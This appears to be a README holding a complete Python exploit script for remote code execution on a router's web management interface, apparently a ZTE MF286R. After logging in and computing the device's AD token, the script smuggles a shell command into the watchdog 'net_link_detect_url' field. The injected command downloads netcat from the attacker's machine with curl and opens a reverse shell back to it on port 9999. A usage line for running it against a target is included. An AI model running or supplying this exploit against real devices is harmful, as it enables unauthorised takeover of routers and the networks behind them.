README.md
Rendering markdown...
import time
import requests
import hashlib
import sys
import base64
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"
FORM = lambda x: {"isTest": False, "goformId": x}
s = requests.Session()
def login():
data = FORM("LOGIN")
data["password"] = PASSWD
status = s.post(
f"{HOST}/goform/goform_set_cmd_process",
headers=HDRS,
data=data,
).json()
login_status = "[+] Login: "
login_status += "success" if status["result"] == "0" else "fail"
print(login_status)
def get_AD():
def md5(s):
m = hashlib.md5()
m.update(s.encode("utf-8"))
return m.hexdigest()
a = md5(wa_inner_version + cr_version)
rd = requests.get(
f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
headers=HDRS,
)
return md5(a + rd.json()["RD"])
def get_response(server_resp):
status = "[+] payload injected: "
if "success" in server_resp.text:
status += "success"
else:
status += "fail"
print(status)
def rce():
dog_form = FORM("WATCH_DOG_SWITCH")
dog_form["net_link_detect_enable"] = 1
payload = ";"
payload += f"curl {IP}:8080/netcat --output /tmp/netcat; "
payload += "chmod +x /tmp/netcat;"
payload += f"/tmp/netcat -e sh {IP} 9999"
dog_form["net_link_detect_url"] = payload
dog_form["AD"] = get_AD()
a = s.post(
f"{HOST}/goform/goform_set_cmd_process",
headers=HDRS,
data=dog_form,
)
get_response(a)
if __name__ == "__main__":
if len(sys.argv) < 4:
print(
"usage: python3 exploit.py http://<router_ip> <admin_password> <attacker_ip, es: 192.168.1.101>"
)
sys.exit(0)
HOST = sys.argv[1]
PASSWD = base64.b64encode(sys.argv[2].encode()).decode()
IP = sys.argv[3]
HDRS = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Origin": HOST,
"Referer": f"{HOST}/index.html",
}
login()
rce()